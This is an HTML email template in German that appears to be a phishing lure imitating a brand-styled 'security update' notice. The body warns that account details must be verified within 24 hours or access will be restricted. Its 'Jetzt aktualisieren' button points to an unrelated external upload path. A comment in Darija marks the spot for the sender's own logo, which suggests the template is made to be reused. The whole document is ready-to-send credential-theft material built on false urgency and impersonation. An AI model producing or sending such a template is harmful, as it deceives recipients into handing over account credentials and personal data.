<!DOCTYPE html>
<html lang="de">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sicherheitsupdate</title>
<style>
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
background-color: #f5f5f7;
margin: 0;
padding: 0;
color: #1d1d1f;
}
.email-container {
max-width: 600px;
margin: 30px auto;
background: #ffffff;
border-radius: 12px;
overflow: hidden;
box-shadow: 0 4px 12px rgba(0,0,0,0.05);
}
.email-header {
background-color: #ffffff;
text-align: center;
padding: 30px 0 20px 0;
border-bottom: 1px solid #d2d2d7;
}
.custom-logo {
width: 150px;
height: auto;
}
.email-body {
padding: 35px;
line-height: 1.6;
}
.email-headline {
font-size: 24px;
font-weight: 600;
text-align: center;
margin-bottom: 20px;
}
.btn {
display: inline-block;
background-color: #0071e3;
color: #ffffff;
text-decoration: none;
padding: 12px 28px;
border-radius: 6px;
margin-top: 25px;
font-weight: 600;
text-align: center;
}
.email-footer {
background-color: #fbfbfd;
text-align: center;
padding: 20px;
font-size: 12px;
color: #86868b;
border-top: 1px solid #d2d2d7;
}
</style>
</head>
<body>
<div class="email-container">
<div class="email-header">
<!-- اللوغو ديالك -->
<img src="https://logo.com/image-cdn/images/kts928pd/production/4429bc095f6ddb190c0457f215d2d625959aae87-1600x900.png?w=1080&q=72&fm=webp" alt="Logo" class="custom-logo">
</div>
<div class="email-body">
<div class="email-headline">
Sicherheitsupdate erforderlich
</div>
<p>Sehr geehrter Kunde,</p>
<p>wir haben festgestellt, dass Ihre Kontoinformationen aktualisiert werden müssen, um die anhaltende Sicherheit Ihres Kontos und den Zugriff auf unsere Dienste zu gewährleisten.</p>
<p>Wenn Sie Ihre Daten nicht innerhalb von 24 Stunden überprüfen und aktualisieren, kann dies zu vorübergehenden Einschränkungen Ihres Kontos führen.</p>
<div style="text-align: center;">
<a href="https://pan.todomor.com/uploads/cap/" class="btn">Jetzt aktualisieren</a>
</div>
<p style="margin-top: 35px; font-size: 14px; color: #515154;">
Mit freundlichen Grüßen,<br>
<strong>Support-Team</strong>
</p>
</div>
<div class="email-footer">
Support | Datenschutz<br>
Copyright © 2026. Alle Rechte vorbehalten.
</div>
</div>
</body>
</html>